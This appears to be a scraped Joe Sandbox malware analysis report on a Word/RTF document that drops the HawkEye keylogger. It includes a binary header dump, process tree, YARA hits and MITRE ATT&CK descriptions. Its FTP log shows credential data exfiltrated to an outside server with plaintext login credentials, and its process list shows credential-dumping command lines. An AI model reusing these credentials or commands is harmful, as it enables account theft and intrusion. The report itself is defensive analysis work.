40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 17 13 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 2d 12 00 a4 e9 00 00 03 00 02 00 23 01 00 06 40 ac 02 00 68 81 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 4b 12 4b 0c 4b f6 45 a4 66 c2 59 79 44 0e 4e a6 60 08 73 10 5d d7 45 ef 66 cc 59 6e 44 0f 4e ba 60 02 73 26 5d f1 45 af 66 c4 59 66 44 1e 4e ae 60 1a 73 1b 5d e4 45 8c 66 ce 59 48 44 29 4e 9d 60 51 41 52 40 50 41 81 53 63 4e 5d 44 a9 6a 4e 79 5c 57 b9 4f ec 6c 90 53 37 4e 45 44 fb 6a 4a 79 0e 57 a5 4f a8 6c 87 53 6b 4e 43 44 f9 6a 47 79 46 57 a8 4f ec 6c 9d 53 70 4e 5b 44 a7 6a 5d 79 15 57 bd 4f f1 6c 9d 53 38 4e 79 44 f1 6a 4a 79 41 57 be 4f ba 6c 81 53 64 4e 5d 44 a9 6a 43 79 45 57 b9 4f f2 6c 99 53 22 4e 47 44 f0 6a 56 79 5d 57 fe 4f e1 6c cd 53 2d 4e 1b 44 f1 6a 56 79 51 57 ac 4f f9 6c 88 53 37 4e 42 44 e4 6a 53 79 17 57 a8 4f f4 6c 8c 53 78 4e 42 44 f0 6a 47 79 05 57 bd 4f e8 6c 9d 53 32 4e 56 44 e1 6a 56 79 58 57 b9 4f b3 6c 8f 53 20 4e 54 44 f1 6a 55 79 07 57 b7 4f ee 6c 8c 53 37 4e 45 44 fd 6a 43 79 07 57 b5 4f f3 6c 9f 53 78 4e 55 44 fa 6a 49 79 41 57 ac 4f e9 6c 90 53 39 4e 55 44 e7 6a 52 79 4b 57 bd 4f f6 6c 93 53 24 4e 56 44 e6 6a 52 79 07 57 f7 4f a6 6c 81 53 66 4e 5d 44 5e fe 5b fe 5c fe 80 ec 29 f1 5d fb ef d5 41 c6 13 2a 52 2a 10 2a 09 12 05 3c f9 24 f0 07 cd 38 7a 25 0b 2f bf 01 10 12 1f 3c f6 24 b1 07 cd 38 67 25 10 2f b5 01 01 12 00 3c f5 24 ac 07 ce 38 66 25 10 2f f8 01 14 12 1e 3c fc 24 f1 07 91 38 2e 25 14 2f a2 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL6 @ ``LO @ H.text `.rsrc @@.reloc@@BH-#@hKKKEfYyDN`s]EfYnDN`s&]EfYfDN`s]EfYHD)N`QAR@PAScN]DjNy\WOlS7NEDjJyWOlSkNCDjGyFWOlSpN[Dj]yWOlS8NyDjJyAWOlSdN]DjCyEWOlS"NGDjVy]WOlS-NDjVyQWOlS7NBDjSyWOlSxNBDjGyWOlS2NVDjVyXWOlS NTDjUyWOlS7NEDjCyWOlSxNUDjIyAWOlS9NUDjRyKWOlS$NVDjRyWOlSfN]D^[\)]AR*<$8z%/<$8g%/<$8f%/<$8.%/

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 10, 2021 15:29:29.247308969 CEST	142.250.185.196	443	192.168.2.22	49168	CN=www.google.com CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US	CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Mon Jul 12 05:48:19 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020	Mon Oct 04 05:48:18 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=GTS CA 1C3, O=Google Trust Services LLC, C=US	CN=GTS Root R1, O=Google Trust Services LLC, C=US	Thu Aug 13 02:00:42 CEST 2020	Thu Sep 30 02:00:42 CEST 2027
					CN=GTS Root R1, O=Google Trust Services LLC, C=US	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Fri Jun 19 02:00:42 CEST 2020	Fri Jan 28 01:00:42 CET 2028

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 10, 2021 15:30:03.003269911 CEST	21	49171	45.141.152.18	192.168.2.22	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 09:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 09:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 09:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 09:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Aug 10, 2021 15:30:03.004230976 CEST	49171	21	192.168.2.22	45.141.152.18	USER logs@badonfashoin.com
Aug 10, 2021 15:30:03.021817923 CEST	21	49171	45.141.152.18	192.168.2.22	331 User logs@badonfashoin.com OK. Password required
Aug 10, 2021 15:30:03.023240089 CEST	49171	21	192.168.2.22	45.141.152.18	PASS sKsYZiIYQn6y
Aug 10, 2021 15:30:03.071213961 CEST	21	49171	45.141.152.18	192.168.2.22	230 OK. Current restricted directory is /
Aug 10, 2021 15:30:03.088944912 CEST	21	49171	45.141.152.18	192.168.2.22	504 Unknown command
Aug 10, 2021 15:30:03.092022896 CEST	49171	21	192.168.2.22	45.141.152.18	PWD
Aug 10, 2021 15:30:03.111788988 CEST	21	49171	45.141.152.18	192.168.2.22	257 "/" is your current location
Aug 10, 2021 15:30:03.112013102 CEST	49171	21	192.168.2.22	45.141.152.18	TYPE I
Aug 10, 2021 15:30:03.129468918 CEST	21	49171	45.141.152.18	192.168.2.22	200 TYPE is now 8-bit binary
Aug 10, 2021 15:30:03.129664898 CEST	49171	21	192.168.2.22	45.141.152.18	PASV
Aug 10, 2021 15:30:03.147156000 CEST	21	49171	45.141.152.18	192.168.2.22	227 Entering Passive Mode (45,141,152,18,243,145)
Aug 10, 2021 15:30:03.167957067 CEST	49171	21	192.168.2.22	45.141.152.18	STOR HawkEye_Keylogger_Stealer_Records_284992 8.10.2021 3:56:04 PM.txt
Aug 10, 2021 15:30:03.186424017 CEST	21	49171	45.141.152.18	192.168.2.22	150 Accepted data connection
Aug 10, 2021 15:30:03.206904888 CEST	21	49171	45.141.152.18	192.168.2.22	226-File successfully transferred 226-File successfully transferred226 0.021 seconds (measured here), 70.81 Kbytes per second

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2824 Parent PID: 584

General

Start time:	15:28:35
Start date:	10/08/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fe70000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2232 Parent PID: 584

General

Start time:	15:28:37
Start date:	10/08/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: name.exe PID: 1708 Parent PID: 2232

General

Start time:	15:28:50
Start date:	10/08/2021
Path:	C:\Users\user\AppData\Roaming\name.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\name.exe'
Imagebase:	0x2b0000
File size:	1245696 bytes
MD5 hash:	83F58ECF0778E3B0ACCA8497DF23EF23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, ReversingLabs
Reputation:	low

Analysis Process: InstallUtil.exe PID: 752 Parent PID: 1708

General

Start time:	15:29:01
Start date:	10/08/2021
Path:	C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Imagebase:	0x9c0000
File size:	41136 bytes
MD5 hash:	BB85AA6D90A4157ED799257072B265FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.2378132295.0000000000760000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.2377939317.0000000000520000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: vbc.exe PID: 2004 Parent PID: 752

General

Start time:	15:29:13
Start date:	10/08/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1170056 bytes
MD5 hash:	1672D0478049ABDAF0197BE64A7F867F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.2171177325.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: vbc.exe PID: 1756 Parent PID: 752

General

Start time:	15:29:13
Start date:	10/08/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1170056 bytes
MD5 hash:	1672D0478049ABDAF0197BE64A7F867F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.2174054080.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report New Updated 20210810.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: HawkEye

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre